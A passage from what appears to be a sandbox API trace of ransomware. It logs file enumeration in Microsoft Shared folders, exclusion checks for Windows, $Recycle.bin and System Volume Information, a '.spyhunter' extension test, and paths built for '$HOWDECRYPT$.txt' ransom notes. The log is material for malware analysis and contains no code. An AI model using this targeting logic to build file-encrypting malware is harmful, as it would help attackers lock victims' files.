(HeapHandle=0x2c0000, Flags=0x8, Size=0xe4) returned 0x34e8d8 [0091.091] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0x1478) returned 0x3824f8 [0091.091] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0091.091] lstrcmpiW (lpString1="FRAR", lpString2="Windows") returned -1 [0091.091] lstrlenW (lpString="Windows") returned 7 [0091.092] lstrcmpiW (lpString1="FRAR", lpString2="$Recycle.bin") returned 1 [0091.092] lstrlenW (lpString="$Recycle.bin") returned 12 [0091.092] lstrcmpiW (lpString1="FRAR", lpString2="System Volume Information") returned -1 [0091.092] lstrlenW (lpString="System Volume Information") returned 25 [0091.092] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\FRAR") returned 64 [0091.092] lstrcmpW (lpString1="FRAR", lpString2=".") returned 1 [0091.092] lstrcmpW (lpString1="FRAR", lpString2="..") returned 1 [0091.092] GetProcessHeap () returned 0x2c0000 [0091.092] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2c10048 [0091.092] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\FRAR\\*") returned 66 [0091.092] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\FRAR\\*", lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 0x335fa0 [0091.095] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0091.095] lstrlenW (lpString="Windows") returned 7 [0091.095] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0091.095] lstrlenW (lpString="$Recycle.bin") returned 12 [0091.096] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0091.096] lstrlenW (lpString="System Volume Information") returned 25 [0091.096] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\FRAR\\.") returned 66 [0091.096] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0091.096] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0091.096] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0091.096] lstrlenW (lpString="Windows") returned 7 [0091.096] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0091.096] lstrlenW (lpString="$Recycle.bin") returned 12 [0091.096] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0091.096] lstrlenW (lpString="System Volume Information") returned 25 [0091.096] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\FRAR\\..") returned 67 [0091.096] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0091.096] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0091.096] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0091.096] lstrcmpiW (lpString1="MSB1FRAR.ITS", lpString2="Windows") returned -1 [0091.096] lstrlenW (lpString="Windows") returned 7 [0091.096] lstrcmpiW (lpString1="MSB1FRAR.ITS", lpString2="$Recycle.bin") returned 1 [0091.096] lstrlenW (lpString="$Recycle.bin") returned 12 [0091.096] lstrcmpiW (lpString1="MSB1FRAR.ITS", lpString2="System Volume Information") returned -1 [0091.096] lstrlenW (lpString="System Volume Information") returned 25 [0091.096] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\FRAR\\MSB1FRAR.ITS") returned 77 [0091.096] StrStrIW (lpFirst="MSB1FRAR.ITS", lpSrch=".spyhunter") returned 0x0 [0091.096] lstrcmpW (lpString1="MSB1FRAR.ITS", lpString2="$HOWDECRYPT$.txt") returned 1 [0091.096] lstrcmpW (lpString1="MSB1FRAR.ITS", lpString2="_uninstalling_.png") returned 1 [0091.096] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\FRAR\\MSB1FRAR.ITS") returned 77 [0091.096] GetProcessHeap () returned 0x2c0000 [0091.096] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xdc) returned 0x377a80 [0091.096] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0x1478) returned 0x3824f8 [0091.097] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 0 [0091.097] FindClose (in: hFindFile=0x335fa0 | out: hFindFile=0x335fa0) returned 1 [0091.097] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\FRAR\\$HOWDECRYPT$.txt") returned 81 [0091.097] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\FRAR\\$HOWDECRYPT$.txt") returned 81 [0091.097] GetProcessHeap () returned 0x2c0000 [0091.097] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe4) returned 0x34e9c8 [0091.097] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0x1480) returned 0x3824f8 [0091.097] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0091.097] lstrcmpiW (lpString1="FREN", lpString2="Windows") returned -1 [0091.097] lstrlenW (lpString="Windows") returned 7 [0091.097] lstrcmpiW (lpString1="FREN", lpString2="$Recycle.bin") returned 1 [0091.097] lstrlenW (lpString="$Recycle.bin") returned 12 [0091.097] lstrcmpiW (lpString1="FREN", lpString2="System Volume Information") returned -1 [0091.097] lstrlenW (lpString="System Volume Information") returned 25 [0091.097] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\FREN") returned 64 [0091.097] lstrcmpW (lpString1="FREN", lpString2=".") returned 1 [0091.097] lstrcmpW (lpString1="FREN", lpString2="..") returned 1 [0091.097] GetProcessHeap () returned 0x2c0000 [0091.097] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2c10048 [0091.097] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\FREN\\*") returned 66 [0091.097] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\FREN\\*", lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 0x335fa0 [0091.098] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0091.098] lstrlenW (lpString="Windows") returned 7 [0091.098] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0091.098] lstrlenW (lpString="$Recycle.bin") returned 12 [0091.098] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0091.098] lstrlenW (lpString="System Volume Information") returned 25 [0091.098] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\FREN\\.") returned 66 [0091.098] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0091.098] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0091.098] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0091.098] lstrlenW (lpString="Windows") returned 7 [0091.098] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0091.098] lstrlenW (lpString="$Recycle.bin") returned 12 [0091.098] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0091.099] lstrlenW (lpString="System Volume Information") returned 25 [0091.099] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\FREN\\..") returned 67 [0091.099] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0091.099] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0091.099] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0091.099] lstrcmpiW (lpString1="MSB1FREN.DLL", lpString2="Windows") returned -1 [0091.099] lstrlenW (lpString="Windows") returned 7 [0091.099] lstrcmpiW (lpString1="MSB1FREN.DLL", lpString2="$Recycle.bin") returned 1 [0091.099] lstrlenW (lpString="$Recycle.bin") returned 12 [0091.099] lstrcmpiW (lpString1="MSB1FREN.DLL", lpString2="System Volume Information") returned -1 [0091.099] lstrlenW (lpString="System Volume Information") returned 25 [0091.099] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\FREN\\MSB1FREN.DLL") returned 77 [0091.099] StrStrIW (lpFirst="MSB1FREN.DLL", lpSrch=".spyhunter") returned 0x0 [0091.099] lstrcmpW (lpString1="MSB1FREN.DLL", lpString2="$HOWDECRYPT$.txt") returned 1 [0091.099] lstrcmpW (lpString1="MSB1FREN.DLL", lpString2="_uninstalling_.png") returned 1 [0091.099] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\FREN\\MSB1FREN.DLL") returned 77 [0091.099] GetProcessHeap () returned 0x2c0000 [0091.099] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xdc) returned 0x377b68 [0091.099] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0x1488) returned 0x3824f8 [0091.099] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0091.099] lstrcmpiW (lpString1="MSB1FREN.ITS", lpString2="Windows") returned -1 [0091.099] lstrlenW (lpString="Windows") returned 7 [0091.099] lstrcmpiW (lpString1="MSB1FREN.ITS", lpString2="$Recycle.bin") returned 1 [0091.099] lstrlenW (lpString="$Recycle.bin") returned 12 [0091.099] lstrcmpiW (lpString1="MSB1FREN.ITS", lpString2="System Volume Information") returned -1 [0091.099] lstrlenW (lpString="System Volume Information") returned 25 [0091.099] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\FREN\\MSB1FREN.ITS") returned 77 [0091.099] StrStrIW (lpFirst="MSB1FREN.ITS", lpSrch=".spyhunter") returned 0x0 [0091.099] lstrcmpW (lpString1="MSB1FREN.ITS", lpString2="$HOWDECRYPT$.txt") returned 1 [0091.099] lstrcmpW (lpString1="MSB1FREN.ITS", lpString2="_uninstalling_.png") returned 1 [0091.099] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\FREN\\MSB1FREN.ITS") returned 77 [0091.099] GetProcessHeap () returned 0x2c0000 [0091.100] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xdc) returned 0x377c50 [0091.100] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0x1490) returned 0x3824f8 [0091.100] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0091.100] lstrcmpiW (lpString1="WT61FR.LEX", lpString2="Windows") returned 1 [0091.100] lstrlenW (lpString="Windows") returned 7 [0091.100] lstrcmpiW (lpString1="WT61FR.LEX", lpString2="$Recycle.bin") returned 1 [0091.100] lstrlenW (lpString="$Recycle.bin") returned 12 [0091.100] lstrcmpiW (lpString1="WT61FR.LEX", lpString2="System Volume Information") returned 1 [0091.100] lstrlenW (lpString="System Volume Information") returned 25 [0091.100] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\FREN\\WT61FR.LEX") returned 75 [0091.100] StrStrIW (lpFirst="WT61FR.LEX", lpSrch=".spyhunter") returned 0x0 [0091.100] lstrcmpW (lpString1="WT61FR.LEX", lpString2="$HOWDECRYPT$.txt") returned 1 [0091.100] lstrcmpW (lpString1="WT61FR.LEX", lpString2="_uninstalling_.png") returned 1 [0091.100] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\FREN\\WT61FR.LEX") returned 75 [0091.100] GetProcessHeap () returned 0x2c0000 [0091.100] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xd8) returned 0x346488 [0091.100] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0x1498) returned 0x3824f8 [0091.100] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 0 [0091.100] FindClose (in: hFindFile=0x335fa0 | out: hFindFile=0x335fa0) returned 1 [0091.100] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\FREN\\$HOWDECRYPT$.txt") returned 81 [0091.100] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\FREN\\$HOWDECRYPT$.txt") returned 81 [0091.100] GetProcessHeap () returned 0x2c0000 [0091.100] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe4) returned 0x34eab8 [0091.100] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0x14a0) returned 0x3824f8 [0091.100] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0091.101] lstrcmpiW (lpString1="MSB1AR.LEX", lpString2="Windows") returned -1 [0091.101] lstrlenW (lpString="Windows") returned 7 [0091.101] lstrcmpiW (lpString1="MSB1AR.LEX", lpString2="$Recycle.bin") returned 1 [0091.101] lstrlenW (lpString="$Recycle.bin") returned 12 [0091.101] lstrcmpiW (lpString1="MSB1AR.LEX", lpString2="System Volume Information") returned -1 [0091.101] lstrlenW (lpString="System Volume Information") returned 25 [0091.101] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\MSB1AR.LEX") returned 70 [0091.101] StrStrIW (lpFirst="MSB1AR.LEX", lpSrch=".spyhunter") returned 0x0 [0091.101] lstrcmpW (lpString1="MSB1AR.LEX", lpString2="$HOWDECRYPT$.txt") returned 1 [0091.101] lstrcmpW (lpString1="MSB1AR.LEX", lpString2="_uninstalling_.png") returned 1 [0091.101] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\MSB1AR.LEX") returned 70 [0091.101] GetProcessHeap () returned 0x2c0000 [0091.101] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xce) returned 0x37e050 [0091.101] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0x14a8) returned 0x3824f8 [0091.101] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0091.101] lstrcmpiW (lpString1="MSB1CACH.LEX", lpString2="Windows") returned -1 [0091.101] lstrlenW (lpString="Windows") returned 7 [0091.101] lstrcmpiW (lpString1="MSB1CACH.LEX", lpString2="$Recycle.bin") returned 1 [0091.101] lstrlenW (lpString="$Recycle.bin") returned 12 [0091.101] lstrcmpiW (lpString1="MSB1CACH.LEX", lpString2="System Volume Information") returned -1 [0091.101] lstrlenW (lpString="System Volume Information") returned 25 [0091.101] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\MSB1CACH.LEX") returned 72 [0091.101] StrStrIW (lpFirst="MSB1CACH.LEX", lpSrch=".spyhunter") returned 0x0 [0091.101] lstrcmpW (lpString1="MSB1CACH.LEX", lpString2="$HOWDECRYPT$.txt") returned 1 [0091.101] lstrcmpW (lpString1="MSB1CACH.LEX", lpString2="_uninstalling_.png") returned 1 [0091.101] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\MSB1CACH.LEX") returned 72 [0091.101] GetProcessHeap () returned 0x2c0000 [0091.101] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xd2) returned 0x346568 [0091.101] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0x14b0) returned 0x3824f8 [0091.102] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0091.102] lstrcmpiW (lpString1="MSB1CORE.DLL", lpString2="Windows") returned -1 [0091.102] lstrlenW (lpString="Windows") returned 7 [0091.102] lstrcmpiW (lpString1="MSB1CORE.DLL", lpString2="$Recycle.bin") returned 1 [0091.102] lstrlenW (lpString="$Recycle.bin") returned 12 [0091.102] lstrcmpiW (lpString1="MSB1CORE.DLL", lpString2="System Volume Information") returned -1 [0091.102] lstrlenW (lpString="System Volume Information") returned 25 [0091.102] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\MSB1CORE.DLL") returned 72 [0091.102] StrStrIW (lpFirst="MSB1CORE.DLL", lpSrch=".spyhunter") returned 0x0 [0091.102] lstrcmpW (lpString1="MSB1CORE.DLL", lpString2="$HOWDECRYPT$.txt") returned 1 [0091.102] lstrcmpW (lpString1="MSB1CORE.DLL", lpString2="_uninstalling_.png") returned 1 [0091.102] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\MSB1CORE.DLL") returned 72 [0091.102] GetProcessHeap () returned 0x2c0000 [0091.102] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xd2) returned 0x346648 [0091.102] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0x14b8) returned 0x3824f8 [0091.102] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0091.102] lstrcmpiW (lpString1="MSB1STAR.DLL", lpString2="Windows") returned -1 [0091.102] lstrlenW (lpString="Windows") returned 7 [0091.102] lstrcmpiW (lpString1="MSB1STAR.DLL", lpString2="$Recycle.bin") returned 1 [0091.102] lstrlenW (lpString="$Recycle.bin") returned 12 [0091.102] lstrcmpiW (lpString1="MSB1STAR.DLL", lpString2="System Volume Information") returned -1 [0091.102] lstrlenW (lpString="System Volume Information") returned 25 [0091.102] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\MSB1STAR.DLL") returned 72 [0091.102] StrStrIW (lpFirst="MSB1STAR.DLL", lpSrch=".spyhunter") returned 0x0 [0091.102] lstrcmpW (lpString1="MSB1STAR.DLL", lpString2="$HOWDECRYPT$.txt") returned 1 [0091.102] lstrcmpW (lpString1="MSB1STAR.DLL", lpString2="_uninstalling_.png") returned 1 [0091.102] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\MSB1STAR.DLL") returned 72 [0091.102] GetProcessHeap () returned 0x2c0000 [0091.102] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xd2) returned 0x346728 [0091.102] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0x14c0) returned 0x3824f8 [0091.103] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0091.103] lstrcmpiW (lpString1="MSB1XTOR.DLL", lpString2="Windows") returned -1 [0091.103] lstrlenW (lpString="Windows") returned 7 [0091.103] lstrcmpiW (lpString1="MSB1XTOR.DLL", lpString2="$Recycle.bin") returned 1 [0091.103] lstrlenW (lpString="$Recycle.bin") returned 12 [0091.103] lstrcmpiW (lpString1="MSB1XTOR.DLL", lpString2="System Volume Information") returned -1 [0091.103] lstrlenW (lpString="System Volume Information") returned 25 [0091.103] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\MSB1XTOR.DLL") returned 72 [0091.103] StrStrIW (lpFirst="MSB1XTOR.DLL", lpSrch=".spyhunter") returned 0x0 [0091.103] lstrcmpW (lpString1="MSB1XTOR.DLL", lpString2="$HOWDECRYPT$.txt") returned 1 [0091.103] lstrcmpW (lpString1="MSB1XTOR.DLL", lpString2="_uninstalling_.png") returned 1 [0091.103] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\MSB1XTOR.DLL") returned 72 [0091.103] GetProcessHeap () returned 0x2c0000 [0091.103] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xd2) returned 0x346808 [0091.103] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0x14c8) returned 0x3824f8 [0091.103] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0091.103] lstrcmpiW (lpString1="WTSP61MS.DLL", lpString2="Windows") returned 1 [0091.104] lstrlenW (lpString="Windows") returned 7 [0091.104] lstrcmpiW (lpString1="WTSP61MS.DLL", lpString2="$Recycle.bin") returned 1 [0091.104] lstrlenW (lpString="$Recycle.bin") returned 12 [0091.104] lstrcmpiW (lpString1="WTSP61MS.DLL", lpString2="System Volume Information") returned 1 [0091.104] lstrlenW (lpString="System Volume Information") returned 25 [0091.104] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\WTSP61MS.DLL") returned 72 [0091.104] StrStrIW (lpFirst="WTSP61MS.DLL", lpSrch=".spyhunter") returned 0x0 [0091.104] lstrcmpW (lpString1="WTSP61MS.DLL", lpString2="$HOWDECRYPT$.txt") returned 1 [0091.104] lstrcmpW (lpString1="WTSP61MS.DLL", lpString2="_uninstalling_.png") returned 1 [0091.104] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\WTSP61MS.DLL") returned 72 [0091.104] GetProcessHeap () returned 0x2c0000 [0091.104] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xd2) returned 0x3468e8 [0091.104] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0x14d0) returned 0x3824f8 [0091.104] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 0 [0091.104] FindClose (in: hFindFile=0x335f60 | out: hFindFile=0x335f60) returned 1 [0091.104] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\$HOWDECRYPT$.txt") returned 76 [0091.104] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\$HOWDECRYPT$.txt") returned 76 [0091.104] GetProcessHeap () returned 0x2c0000 [0091.104] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xda) returned 0x377428 [0091.116] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0x14d0) returned 0x3824f8 [0091.117] FindNextFileW (in: hFindFile=0x335f20, lpFindFileData=0x298f348 | out: lpFindFileData=0x298f348) returned 1 [0091.117] lstrcmpiW (lpString1="Triedit", lpString2="Windows") returned -1 [0091.117] lstrlenW (lpString="Windows") returned 7 [0091.117] lstrcmpiW (lpString1="Triedit", lpString2="$Recycle.bin") returned 1 [0091.117] lstrlenW (lpString="$Recycle.bin") returned 12 [0091.117] lstrcmpiW (lpString1="Triedit", lpString2="System Volume Information") returned 1 [0091.117] lstrlenW (lpString="System Volume Information") returned 25 [0091.117] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Triedit") returned 58 [0091.117] lstrcmpW (lpString1="Triedit", lpString2=".") returned 1 [0091.117] lstrcmpW (lpString1="Triedit", lpString2="..") returned 1 [0091.117] GetProcessHeap () returned 0x2c0000 [0091.117] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0091.118] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Triedit\\*") returned 60 [0091.118] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Triedit\\*", lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 0x335f60 [0091.118] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0091.118] lstrlenW (lpString="Windows") returned 7 [0091.118] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0091.118] lstrlenW (lpString="$Recycle.bin") returned 12 [0091.118] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0091.118] lstrlenW (lpString="System Volume Information") returned 25 [0091.118] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Triedit\\.") returned 60 [0091.119] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0091.119] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0091.119] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0091.119] lstrlenW (lpString="Windows") returned 7 [0091.119] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0091.119] lstrlenW (lpString="$Recycle.bin") returned 12 [0091.119] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0091.119] lstrlenW (lpString="System Volume Information") returned 25 [0091.119] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Triedit\\..") returned 61 [0091.119] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0091.119] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0091.119] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0091.119] lstrcmpiW (lpString1="en-US", lpString2="Windows") returned -1 [0091.119] lstrlenW (lpString="Windows") returned 7 [0091.119] lstrcmpiW (lpString1="en-US", lpString2="$Recycle.bin") returned 1 [0091.119] lstrlenW (lpString="$Recycle.bin") returned 12 [0091.119] lstrcmpiW (lpString1="en-US", lpString2="System Volume Information") returned -1 [0091.119] lstrlenW (lpString="System Volume Information") returned 25 [0091.119] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Triedit\\en-US") returned 64 [0091.119] lstrcmpW (lpString1="en-US", lpString2=".") returned 1 [0091.119] lstrcmpW (lpString1="en-US", lpString2="..") returned 1 [0091.119] GetProcessHeap () returned 0x2c0000 [0091.119] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2c10048 [0091.120] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Triedit\\en-US\\*") returned 66 [0091.120] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Triedit\\en-US\\*", lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 0x335fa0 [0091.128] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0091.128] lstrlenW (lpString="Windows") returned 7 [0091.128] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0091.128] lstrlenW 